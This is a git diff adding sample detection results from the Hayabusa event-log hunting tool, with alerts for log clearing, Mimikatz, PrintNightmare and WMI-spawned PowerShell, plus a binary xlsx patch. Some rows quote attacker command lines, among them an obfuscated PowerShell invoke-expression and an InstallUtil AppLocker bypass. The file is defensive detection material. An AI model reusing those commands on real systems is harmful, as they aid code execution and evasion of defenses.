+2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: ""cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i'))  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: OFFSEC\admmig  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs  :  Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  :  User: CYBERCAT\pc1-user  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil  :  Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  :  User: CYBERCAT\pc1-user  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx
new file mode 100644
index 0000000000000000000000000000000000000000..0b2d2443afc96f21071580150345c2f41c87578f
GIT binary patch
literal 583620
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
